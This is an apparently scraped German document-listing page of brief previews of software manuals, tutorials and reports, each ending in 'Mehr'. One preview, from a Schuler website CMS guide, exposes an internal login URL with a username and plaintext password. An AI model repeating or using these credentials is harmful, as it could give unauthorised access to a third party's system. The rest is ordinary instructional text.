Um die Rücklagen ordnungsgemäß zu verbuchen, ist es wichtig, Schritt-für-Schritt vorzugehen: Software WISO Hausverwalter 2014 Thema Eingabe von Rücklagenbuchungen Version / Datum V 1.2 / 28.05.2013 Um die Rücklagen ordnungsgemäß zu verbuchen, ist es wichtig, Schritt-für-Schritt vorzugehen: Schritt

Mehr

Ablauf und Tipps über ein Zertifizierungsverfahren

Ablauf und Tipps über ein Zertifizierungsverfahren Qualitätsmanagement-System Ablauf und Tipps über ein sverfahren weitergegeben werden! 1 sablauf 1. Auditvorbereitung Für die Einleitung des sverfahrens 2. Vorgespräch Zur Voransicht von QM-Unterlagen,

Mehr

AGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom 21.10.2013b

AGROPLUS Buchhaltung. Daten-Server und Sicherheitskopie. Version vom 21.10.2013b AGROPLUS Buchhaltung Daten-Server und Sicherheitskopie Version vom 21.10.2013b 3a) Der Daten-Server Modus und der Tresor Der Daten-Server ist eine Betriebsart welche dem Nutzer eine grosse Flexibilität

Mehr

Schuljahreswechsel im Schul-Webportal

Schuljahreswechsel im Schul-Webportal Schuljahreswechsel im Schul-Webportal Seite 1 von 8 Schuljahreswechsel im Schul-Webportal Ablauf Übersicht: Schritte 1 bis 10: Schritte 11 bis 16: Schritte 17 bis 20: Vorbereitung des Schuljahreswechsels

Mehr

Datenbanken Microsoft Access 2010

Datenbanken Microsoft Access 2010 Datenbanken Microsoft Access 2010 Abfragen Mithilfe von Abfragen kann ich bestimmte Informationen aus einer/mehrerer Tabellen auswählen und nur diese anzeigen lassen die Daten einer/mehrerer Tabellen sortieren

Mehr

Lausanne, den XX yyyyy 2012. Sehr geehrte Frau/ Herr,

Lausanne, den XX yyyyy 2012. Sehr geehrte Frau/ Herr, Lausanne, den XX yyyyy 2012 Sehr geehrte Frau/ Herr, das Schweizer Kompetenzzentrum für Sozialwissenschaften (FORS) an der Universität Lausanne führt zurzeit den European Social Survey (ESS) durch. Diese

Mehr

teamsync Kurzanleitung

teamsync Kurzanleitung 1 teamsync Kurzanleitung Version 4.0-19. November 2012 2 1 Einleitung Mit teamsync können Sie die Produkte teamspace und projectfacts mit Microsoft Outlook synchronisieren.laden Sie sich teamsync hier

Mehr

SCHULER WEBSITE - EINKAUF DOKUMENTE EINSTELLEN & AKTUALISIEREN

SCHULER WEBSITE - EINKAUF DOKUMENTE EINSTELLEN & AKTUALISIEREN SCHULER WEBSITE - EINKAUF DOKUMENTE EINSTELLEN & AKTUALISIEREN 1 STARTMASKE CMS FIONA ANMELDUNG Link: http://cmssrv02.schuler.de:8080/default/nps/login User: seiler PW: start1234 (bitte Passwort nach erster

Mehr

1 Einleitung. Lernziele. automatische Antworten bei Abwesenheit senden. Einstellungen für automatische Antworten Lerndauer. 4 Minuten.

1 Einleitung. Lernziele. automatische Antworten bei Abwesenheit senden. Einstellungen für automatische Antworten Lerndauer. 4 Minuten. 1 Einleitung Lernziele automatische Antworten bei Abwesenheit senden Einstellungen für automatische Antworten Lerndauer 4 Minuten Seite 1 von 18 2 Antworten bei Abwesenheit senden» Outlook kann während

Mehr

Von Perimeter-Security zu robusten Systemen

Von Perimeter-Security zu robusten Systemen Von Perimeter-Security zu robusten Systemen Prof. Dr. Norbert Pohlmann Institut für Internet-Sicherheit if(is) Fachhochschule Gelsenkirchen http://www.internet-sicherheit.de Inhalt Motivation Perimeter

Mehr

Internet und e-mail Datensicherung für Frankfurter Schulen mit einem Bandlaufwerk unter MS Windows NT Server Frage:

Internet und e-mail Datensicherung für Frankfurter Schulen mit einem Bandlaufwerk unter MS Windows NT Server Frage: Datensicherung für Frankfurter Schulen mit einem Bandlaufwerk unter MS Windows NT Server Frage: Wie wird unter einem Windows NT Server die Datensicherung für Frankfurter Schulen auf einem Bandlaufwerk

Mehr

Installationsanleitung. Ab Version 2.0.0.0

Installationsanleitung. Ab Version 2.0.0.0 Installationsanleitung Ab Version 2.0.0.0 1 Einleitung Bitte lesen Sie die Installationsanleitung zuerst aufmerksam durch, bevor Sie mit der Installation des Korrelatorprogramms fortfahren. Damit eine

Mehr

WinVetpro im Betriebsmodus Laptop

WinVetpro im Betriebsmodus Laptop WinVetpro im Betriebsmodus Laptop Um Unterwegs Daten auf einem mobilen Gerät mit WinVetpro zu erfassen, ohne den Betrieb in der Praxis während dieser Zeit zu unterbrechen und ohne eine ständige Online

Mehr

PSW Datenfernübertragung (ELDA, EDIFACT & Co)

PSW Datenfernübertragung (ELDA, EDIFACT & Co) PSW Datenfernübertragung (ELDA, EDIFACT & Co) Erstellen von Datenträgern In der Frühzeit der EDV wurden Daten hauptsächlich mittels Datenträgern übermittelt, d.h. die Daten wurden auf ein Magnetband, eine

Mehr

Nikon Message Center

Nikon Message Center Nikon Message Center Hinweis für Anwender in Europa und in den USA 2 Automatische Aktualisierung 3 Manuelle Überprüfung auf Aktualisierungen 3 Das Fenster von Nikon Message Center 4 Update-Informationen

Mehr

Navigation. Drucken Klicken Sie auf ein Symbol, um nähere Informationen zu erhalten. Papierhandhabung Anzeigen der Online-Informationen

Navigation. Drucken Klicken Sie auf ein Symbol, um nähere Informationen zu erhalten. Papierhandhabung Anzeigen der Online-Informationen Klicken Sie auf ein Symbol, um nähere Informationen zu erhalten. 1 Anzeigen der Online-Informationen Durchsuchen der Online-Informationen Drucken der Online-Informationen Anzeigen der Online-Informationen

Mehr

Konzeption & Umsetzung eines länderübergreifenden IKZM - Prozesses

Konzeption & Umsetzung eines länderübergreifenden IKZM - Prozesses Ergebnisse der online-befragung Konzeption & Umsetzung eines länderübergreifenden IKZM - Prozesses Prognos AG Mai 2009 1 Allgemeine Hinweise zur online - Befragung Untersuchungsgegenstand: Forschungsvorhaben

Mehr

Inhaltsverzeichnis Inhaltsverzeichnis

Inhaltsverzeichnis Inhaltsverzeichnis Inhaltsverzeichnis Inhaltsverzeichnis Eduroam an anderen Hochschulen... 3 Voraussetzungen für Drahtlosnetzwerk (WLAN) eduroam an anderen Hochschulen... 4 Einrichtung des WLAN unter Windows... 4... 5 Voraussetzungen

Mehr

Insiderwissen 2013. Hintergrund

Insiderwissen 2013. Hintergrund Insiderwissen 213 XING EVENTS mit der Eventmanagement-Software für Online Eventregistrierung &Ticketing amiando, hat es sich erneut zur Aufgabe gemacht zu analysieren, wie Eventveranstalter ihre Veranstaltungen

Mehr

Pflegedossier für die kreisfreie Stadt Frankfurt (Oder)

Pflegedossier für die kreisfreie Stadt Frankfurt (Oder) Pflegedossier für die kreisfreie Stadt Frankfurt (Oder) Regionalbüros für Fachkräftesicherung - Fachkräftemonitoring - EUROPÄISCHE UNION Europäischer Sozialfonds Dieses Projekt wird durch das Ministerium

Mehr

Shopz Zugang Neuanmeldung

Shopz Zugang Neuanmeldung Web Sales, IBM Deutschland Shopz Zugang Neuanmeldung IBM ID einrichten Shopz-Zugang anmelden Shopz Login User ID Management IBM ID und Shopz Zugang im Überblick Überblick ibm.com/software/de/websolutions/

Mehr

HamburgService Registrierung für die Online-Dienste Gutachterverfahren (GUV) und Gutachterinformationssystem (GIS)

HamburgService Registrierung für die Online-Dienste Gutachterverfahren (GUV) und Gutachterinformationssystem (GIS) Behörde für Arbeit, Soziales, Familie und Integration Versorgungsamt Hamburg HamburgService Registrierung für die Online-Dienste Gutachterverfahren (GUV) und Gutachterinformationssystem (GIS) Der HamburgService

Mehr

Anti-Botnet-Beratungszentrum. Windows XP in fünf Schritten absichern

Anti-Botnet-Beratungszentrum. Windows XP in fünf Schritten absichern Windows XP in fünf Schritten absichern Inhalt: 1. Firewall Aktivierung 2. Anwendung eines Anti-Virus Scanner 3. Aktivierung der automatischen Updates 4. Erstellen eines Backup 5. Setzen von sicheren Passwörtern

Mehr

Naturgewalten & Risikoempfinden

Naturgewalten & Risikoempfinden Naturgewalten & Risikoempfinden Eine aktuelle Einschätzung durch die TIROLER Bevölkerung Online-Umfrage Juni 2015 Eckdaten zur Untersuchung - Online-Umfrage von 11.-17. Juni 2015 - Themen... - Einschätzung

Mehr

SCHALTEN SIE DEN DATENSCHUTZ EIN. EINFACH & EFFEKTIV.

SCHALTEN SIE DEN DATENSCHUTZ EIN. EINFACH & EFFEKTIV. SCHALTEN SIE DEN DATENSCHUTZ EIN. EINFACH & EFFEKTIV. DER DATENSCHUTZMANAGER IST DIE ALL-IN-ONE-LÖSUNG FÜR EINE EFFEKTIVE DATENSCHUTZ ORGANISATION. IN EINER ZENTRALEN PLATTFORM HABEN WIR ALLE FUNKTIONEN

Mehr

Anlage eines neuen Geschäftsjahres in der Office Line

Anlage eines neuen Geschäftsjahres in der Office Line Leitfaden Anlage eines neuen Geschäftsjahres in der Office Line Version: 2016 Stand: 04.11.2015 Nelkenweg 6a 86641 Rain am Lech Stand: 04.11.2015 Inhalt 1 Zielgruppe... 3 2 Zeitpunkt... 3 3 Fragen... 3

Mehr

Inhaltsverzeichnis WWW.STEMMER-IMAGING.COM

Inhaltsverzeichnis WWW.STEMMER-IMAGING.COM Inhaltsverzeichnis 1 Identifizierung...2 2 Sicherheitshinweise...3 3 Das Anschließen...3 3.1 Für die Nutzung der RS232 Schnittstelle... 3 3.2 Für die Nutzung der USB Schnittstelle... 3 4 Die Inbetriebnahme...3

Mehr

Melde- und Veröffentlichungsplattform Portal (MVP Portal) Hochladen einer XML-Datei

Melde- und Veröffentlichungsplattform Portal (MVP Portal) Hochladen einer XML-Datei Seite 1 Melde- und Veröffentlichungsplattform Portal (MVP Portal) Hochladen einer XML-Datei Seite 2 1 Inhalt Melde- und Veröffentlichungsplattform Portal... 1 (MVP Portal)... 1 Hochladen einer XML-Datei...

Mehr

Journaling-Dateisysteme

Journaling-Dateisysteme Journaling-Dateisysteme 1. Theoretische Grundlagen Was bedeutet Journaling? Wieso ist Journaling nützlich/nötig? Welche Möglichkeiten gibt es? Was sind die Nachteile? 2. Implementierungsbeispiele ext3

Mehr

Anwendung der DIN EN ISO 9241 bei der Erstellung und Bewertung von Software

Anwendung der DIN EN ISO 9241 bei der Erstellung und Bewertung von Software Anwendung der DIN EN ISO 9241 bei der Erstellung und Bewertung von Software Abstract Die Norm DIN EN ISO 9241 "Ergonomische Anforderungen für Bürotätigkeiten mit Bildschirmgeräten" ist von zentraler Bedeutung

Mehr

Einrichtung eines e-mail-konto mit Thunderbird

Einrichtung eines e-mail-konto mit Thunderbird Einrichtung eines e-mail-konto mit Thunderbird In diesem Tutorial zeigen wir Ihnen, wie Sie im Mozilla Thunderbird E-Mailclient ein POP3- Konto einrichten. Wir haben bei der Erstellung des Tutorials die

Mehr

Anleitung. Verschieben des alten E-Mail-Postfachs (z.b. unter Thunderbird) in den neuen Open Xchange-Account

Anleitung. Verschieben des alten E-Mail-Postfachs (z.b. unter Thunderbird) in den neuen Open Xchange-Account Anleitung Verschieben des alten E-Mail-Postfachs (z.b. unter Thunderbird) in den neuen Open Xchange-Account Am Dienstag, den 25.03.2014 werden alle E-Mail-Accounts vom alten auf den neuen E-Mail-Server

Mehr

Einführung in das Web Content Management System (CMS) Typo3

Einführung in das Web Content Management System (CMS) Typo3 Einführung in das Web Content Management System (CMS) Typo3 Übung im Rahmen der Vorlesung ARIS (IW13vz/tzC) Chur, den 29.10.2014 Agenda Einführung und theoretische Grundlagen zu CMS Demonstration der Grundfunktionen

Mehr

TimeSafe Zeiterfassung. Version 2.5 (April 2009)

TimeSafe Zeiterfassung. Version 2.5 (April 2009) TimeSafe Zeiterfassung Version 2.5 (April 2009) Die TimeSafe Zeiterfassung ist bereits bei über 50 Unternehmen aus verschiedensten Branchen produktiv im Einsatz. Um die Leistungsfähigkeit weiter zu erhöhen

Mehr

Fremdwährungen in Buchungen erfassen

Fremdwährungen in Buchungen erfassen Fremdwährungen in Buchungen erfassen Bereich: FIBU - Info für Anwender Nr. 1163 Inhaltsverzeichnis 1. Ziel 2. Vorgehensweisen 2.1. Buchung in Fremdwährung erfassen 2.2. Konto in Fremdwährung führen 3.

Mehr

Windows 7 Ordner und Dateien in die Taskleiste einfügen

Windows 7 Ordner und Dateien in die Taskleiste einfügen WI.005, Version 1.1 07.04.2015 Kurzanleitung Windows 7 Ordner und Dateien in die Taskleiste einfügen Möchten Sie Ordner oder Dateien direkt in die Taskleiste ablegen, so ist das nur mit einem Umweg möglich,

Mehr

Installationshinweise Linux Edubuntu 7.10 bei Verwendung des PC-Wächter

Installationshinweise Linux Edubuntu 7.10 bei Verwendung des PC-Wächter Dr. Kaiser Systemhaus GmbH Köpenicker Straße 325 12555 Berlin Telefon: (0 30) 65 76 22 36 Telefax: (0 30) 65 76 22 38 E-Mail: info@dr-kaiser.de Internet: www.dr-kaiser.de Zielstellung: Installationshinweise

Mehr

Der Jazz Veranstaltungskalender für Deutschland, Österreich und die Schweiz

Der Jazz Veranstaltungskalender für Deutschland, Österreich und die Schweiz Veranstaltung erstellen mit vorheriger Registrierung Wenn Sie sich bei Treffpunkt Jazz registrieren, genießen Sie folgende Vorteile: Sie können bereits eingestellte Veranstaltungen auch noch später ändern

Mehr

Zahlungsverkehr in LOHN

Zahlungsverkehr in LOHN Zahlungsverkehr in LOHN Bereich: LOHN - Info für Anwender Nr. 1679 Inhaltsverzeichnis 1. Ziel 2. Voraussetzungen 3. Vorgehensweise 3.1. Zahlungsverkehr in LOHN einrichten 3.2. Monatliche Zahlungen erzeugen

Mehr

STLB-Bau Kundenmanager

STLB-Bau Kundenmanager STLB-Bau Kundenmanager Kundenmanager Er managt keine Kunden, aber alle Fragen und deren Antworten! Ich möchte Ihnen folgende Fragen beantworten: Wie können Sie Ihre Fragen stellen? Wo können Sie Ihre Fragen

Mehr

Praxisnah - aussagekräftig - aktuell. für effiziente Marktbearbeitung. und fundierte Trendanalysen

Praxisnah - aussagekräftig - aktuell. für effiziente Marktbearbeitung. und fundierte Trendanalysen Praxisnah - aussagekräftig - aktuell für effiziente Marktbearbeitung und fundierte Trendanalysen Hersteller-Service Benchmarking Jahresbericht Kundenzufriedenheit 2015 Benchmarking Allgemeine Ergebnisse

Mehr

M@school Software- und Druckerzuweisung Selbstlernmaterialien

M@school Software- und Druckerzuweisung Selbstlernmaterialien Bildung und Sport M@school Software- und Druckerzuweisung Selbstlernmaterialien Hinweise zum Skript: LMK = Linker Mausklick RMK = Rechter Mausklick LMT = Linke Maustaste RMT = Rechte Maustaste Um die Lesbarkeit

Mehr

EvaSys-Export (Stand 25.04.2014)

EvaSys-Export (Stand 25.04.2014) EvaSys-Export (Stand 25.04.2014) Zur Evaluierung von Lehrveranstaltungen wird an der Universität Tübingen die Software EvaSys eingesetzt. Um eine Lehrveranstaltungsevaluation durchführen zu können, müssen

Mehr

CMS.R. Bedienungsanleitung. Modul Cron. Copyright 10.09.2009. www.sruttloff.de CMS.R. - 1 - Revision 1

CMS.R. Bedienungsanleitung. Modul Cron. Copyright 10.09.2009. www.sruttloff.de CMS.R. - 1 - Revision 1 CMS.R. Bedienungsanleitung Modul Cron Revision 1 Copyright 10.09.2009 www.sruttloff.de CMS.R. - 1 - WOZU CRON...3 VERWENDUNG...3 EINSTELLUNGEN...5 TASK ERSTELLEN / BEARBEITEN...6 RECHTE...7 EREIGNISSE...7

Mehr

Gesundheitsförderliche Mitarbeitergespräche (smag) Quelle: GeFüGe-Projekt, bearbeitet durch Karsten Lessing, TBS NRW

Gesundheitsförderliche Mitarbeitergespräche (smag) Quelle: GeFüGe-Projekt, bearbeitet durch Karsten Lessing, TBS NRW Gesundheitsförderliche Mitarbeitergespräche (smag) Quelle: GeFüGe-Projekt, bearbeitet durch Karsten Lessing, TBS NRW Inhaltsverzeichnis 1. STICHWORT... 3 2. KURZBESCHREIBUNG... 3 3. EINSATZBEREICH... 4

Mehr

Anleitungen TYPO 3 Eingaben tätigen

Anleitungen TYPO 3 Eingaben tätigen Anleitungen TYPO 3 Eingaben tätigen Rufen Sie die Seite http://typo3.lpm.unisb.de/testsite/typo3/ auf! Melden Sie sich mit Benutzernamen und Passwort an! Abbildung 1 Es erscheint folgender Bildschirm:

Mehr

Sichere E-Mail Anleitung Zertifikate / Schlüssel für Kunden der Sparkasse Germersheim-Kandel. Sichere E-Mail. der

Sichere E-Mail Anleitung Zertifikate / Schlüssel für Kunden der Sparkasse Germersheim-Kandel. Sichere E-Mail. der Sichere E-Mail der Nutzung von Zertifikaten / Schlüsseln zur sicheren Kommunikation per E-Mail mit der Sparkasse Germersheim-Kandel Inhalt: 1. Voraussetzungen... 2 2. Registrierungsprozess... 2 3. Empfang

Mehr

Export von Daten im Rechnungswesen

Export von Daten im Rechnungswesen Export von Daten im Rechnungswesen Bereich: FIBU - Info für Anwender Nr. 1104 Inhaltsverzeichnis 1. Ziel 2. Vorgehensweise 2.1. Fibu-Daten bereitstellen 2.2. Anlag-Daten bereitstellen 3. Details 3.1. Entscheidungshilfe

Mehr

Step by Step Softwareverteilung unter Novell. von Christian Bartl

Step by Step Softwareverteilung unter Novell. von Christian Bartl Step by Step Softwareverteilung unter Novell von Softwareverteilung unter Novell 1) Starten von einfachen *.EXE-Dateien: Starten sie ConsoleOne Erstellen sie eine eigene Organisationseinheit für ihre Anwendungen

Mehr

Hacking for your security - Penetration Testing

Hacking for your security - Penetration Testing jens.liebchen@redteam-pentesting.de http://www.redteam-pentesting.de 22. Februar 2006 Wir wissen nicht, was für Lücken wir haben - deshalb juckt uns das nicht. Agenda Über RedTeam 14:00 Uhr Vorstellung

Mehr

Downloadfehler in DEHSt-VPSMail. Workaround zum Umgang mit einem Downloadfehler

Downloadfehler in DEHSt-VPSMail. Workaround zum Umgang mit einem Downloadfehler Downloadfehler in DEHSt-VPSMail Workaround zum Umgang mit einem Downloadfehler Downloadfehler bremen online services GmbH & Co. KG Seite 2 Inhaltsverzeichnis Vorwort...3 1 Fehlermeldung...4 2 Fehlerbeseitigung...5

Mehr

Benutzer, Gruppen, Zugriffsrechte

Benutzer, Gruppen, Zugriffsrechte Benutzer, Gruppen, Zugriffsrechte Einschränkungen von Rechten an Dateien für bestimmte Benutzer oder Gruppen hat den Vorteil, dass das die entsprechenden Daten viel stärker vor unbefugtem Zugriff geschützt

Mehr

Anleitung zum LPI ATP Portal www.lpi-training.eu

Anleitung zum LPI ATP Portal www.lpi-training.eu Anleitung zum LPI ATP Portal www.lpi-training.eu Version 1.0 vom 01.09.2013 Beschreibung des Anmeldevorgangs und Erklärung der einzelnen Menüpunkte. Anmeldevorgang: 1. Gehen Sie auf die Seite http://www.lpi-training.eu/.

Mehr

inviu routes Installation und Erstellung einer ENAiKOON id

inviu routes Installation und Erstellung einer ENAiKOON id inviu routes Installation und Erstellung einer ENAiKOON id Inhaltsverzeichnis inviu routes... 1 Installation und Erstellung einer ENAiKOON id... 1 1 Installation... 1 2 Start der App... 1 3 inviu routes

Mehr

OP-LOG www.op-log.de

OP-LOG www.op-log.de Verwendung von Microsoft SQL Server, Seite 1/18 OP-LOG www.op-log.de Anleitung: Verwendung von Microsoft SQL Server 2005 Stand Mai 2010 1 Ich-lese-keine-Anleitungen 'Verwendung von Microsoft SQL Server

Mehr

Die Zertifizierungsstelle der TÜV Informationstechnik GmbH bescheinigt hiermit dem Unternehmen

Die Zertifizierungsstelle der TÜV Informationstechnik GmbH bescheinigt hiermit dem Unternehmen Die Zertifizierungsstelle der TÜV Informationstechnik GmbH bescheinigt hiermit dem Unternehmen TC TrustCenter GmbH Sonninstraße 24-28 20097 Hamburg für den Zeitstempeldienst Time Stamping Authority (TSA)

Mehr

INTERNET-PERSONALMARKETING IM SCHIFF- UND BOOTSBAU

INTERNET-PERSONALMARKETING IM SCHIFF- UND BOOTSBAU INTERNET-PERSONALMARKETING IM SCHIFF- UND BOOTSBAU Eine praxisorientierte Analyse der Metropolregion Hamburg eine Studie der atenta Personalberatung Jan Kirchner (Dipl.Kfm.) & Alexander Fedossov (M.A.)

Mehr

Produktvorstellung: CMS System / dynamische Webseiten. 1. Vorwort

Produktvorstellung: CMS System / dynamische Webseiten. 1. Vorwort ALEX IT-Service Ihr IT Servicepartner»ALEX-IT Service«16341 Panketal an unsere Kundschaft Ihr Zeichen, Ihre Nachricht Unser Zeichen Telefon, Name Datum CMS 13.01.2010 Produktvorstellung: CMS System / dynamische

Mehr

So geht s Schritt-für-Schritt-Anleitung

So geht s Schritt-für-Schritt-Anleitung So geht s Schritt-für-Schritt-Anleitung Software WISO Mein Büro Thema Nutzung der Internetmarke Version/Datum V 14.00.08.300 Mit der Software WISO Mein Büro können Sie Ihr Guthaben (oder auch E-Porto )

Mehr

Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank

Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank Advoware mit VPN Zugriff lokaler Server / PC auf externe Datenbank Die Entscheidung Advoware über VPN direkt auf dem lokalen PC / Netzwerk mit Zugriff auf die Datenbank des zentralen Servers am anderen

Mehr

Praktische Prüfung Altenpflege Bewertungskriterien in der Durchführung

Praktische Prüfung Altenpflege Bewertungskriterien in der Durchführung Teil 1: Planung und Vorbereitung Das Kriterienraster für die Planungsphase bezieht sich - den Schritten des Pflegeprozesses folgend - auf die Kriterien Informationssammlung, Erkennen von Problemen und

Mehr

Sie können diesen Service verwenden, um fast beliebig große Dateien auch über 2 GB zu versenden.

Sie können diesen Service verwenden, um fast beliebig große Dateien auch über 2 GB zu versenden. 1 Informationen zum F*EX Service von BelWü Sie können diesen Service verwenden, um fast beliebig große Dateien auch über 2 GB zu versenden. 2 Registrierung für den Service Auf fex.belwue.de finden Sie

Mehr

Word-Vorlagen-System mit Outlookanbindung

Word-Vorlagen-System mit Outlookanbindung Inhalt der FAQ In Datei Zvlg_koerner.dot ist schreibgeschützt (Windows 7 bzw Windows 8) Probleme beim Speichern des Lizenzcodes... 2 Ermitteln des Word-Start-Up-Ordners... 3.Office Methode... 3 Microsoft-Methode

Mehr

2) Geben Sie in der Anmeldemaske Ihren Zugangsnamen und Ihr Passwort ein

2) Geben Sie in der Anmeldemaske Ihren Zugangsnamen und Ihr Passwort ein Kurzanleitung für die Nutzung der Bildergalerie Zugangsdaten zur Bildergalerie des Imkervereins Weinsberg Um einen namentlichen Benutzerzugang zur Bildergalerie des Imkervereins Weinsberg zu erhalten (http://bilder.imker-weinsbergertal.de)

Mehr

ORCA Software GmbH Kunstmühlstraße 16 D-83026 Rosenheim Telefon +49(0) 8031-40688-0 Fax +49(0) 8031-40688-11 info@orca-software.

ORCA Software GmbH Kunstmühlstraße 16 D-83026 Rosenheim Telefon +49(0) 8031-40688-0 Fax +49(0) 8031-40688-11 info@orca-software. Die Planerwelt in was Sie Ihrer Zielgruppe in Ihrem Katalog alles bieten können Referent: Florian Bielmeier/Vertrieb Versetzen wir uns in die Situation des Fachplaners Der Fachplaner benötigt für sein

Mehr

Die Entwicklung eines Glossars (oder eines kontrollierten Vokabulars) für ein Unternehmen geht üblicherweise in 3 Schritten vor sich:

Die Entwicklung eines Glossars (oder eines kontrollierten Vokabulars) für ein Unternehmen geht üblicherweise in 3 Schritten vor sich: Glossare 1 Inhalt 1 Inhalt... 1 2 Prozesse... 1 3 Eine kleine Zeittabelle...... 1 4 Die ersten Schritte... 2 5 Die nächsten Schritte...... 2 6 Die letzten Schritte... 3 7 Das Tool...... 4 8 Beispiele...

Mehr

Ressourceneinsatzplanung in der Fertigung

Ressourceneinsatzplanung in der Fertigung Fakultät Informatik, Institut für Angewandte Informatik, Professur Modellierung und Simulation Ressourceneinsatzplanung in der Fertigung Dr. Christoph Laroque Sommersemester 2012 Dresden, Was war Die im

Mehr

* zum Ortstarif, zusätzliche Kosten fallen nicht an

* zum Ortstarif, zusätzliche Kosten fallen nicht an Anleitung zum Wechsel Ihrer neuen VR-Networld-Card (SECCOS 6) in Ihrer ProfiCash-Software ACHTUNG: Diese Anleitung gilt ausschließlich für die Versionen ab 9.3 1 Vorbereitungen Bevor Sie mit dem Wechsel

Mehr

Dokumentation zeitgesteuerter E-Mail-Versand mit Attachments. zum Projekt. Deutsche Gesellschaft für Zahn-, Mund- und Kieferheilkunde

Dokumentation zeitgesteuerter E-Mail-Versand mit Attachments. zum Projekt. Deutsche Gesellschaft für Zahn-, Mund- und Kieferheilkunde mit Attachments zum Projekt Deutsche Gesellschaft für Zahn-, Mund- und Kieferheilkunde 1 EINRICHTUNG 3 1.1 OBJEKTAUFRUFPLANER 3 1.2 MARKETING & VERTRIEB EINRICHTUNG 5 2 ZEITGESTEUERTER E-MAIL-VERSAND 6

Mehr

Installationsanleitung für Update SC-Line 2010.3

Installationsanleitung für Update SC-Line 2010.3 SYSTEMVORAUSSETZUNGEN SC-Line 2010.3 benötigt für den Betrieb Windows 2000, Windows XP, Windows Vista - (32Bit und 64Bit), Windows 7 - (32Bit und 64Bit), Windows Server 2003, Windows Server 2008 - (32Bit

Mehr

Archivierung von Mails des Exchange-Systems

Archivierung von Mails des Exchange-Systems 05.08.2004 Universitätsrechenzentrum Sven Vollmann Telefon: 987-2342 E-Mail: Sven.Vollmann@FernUni-Hagen.de Archivierung von Mails des Exchange-Systems Die Mailordner auf dem Exchange-System wachsen ständig,

Mehr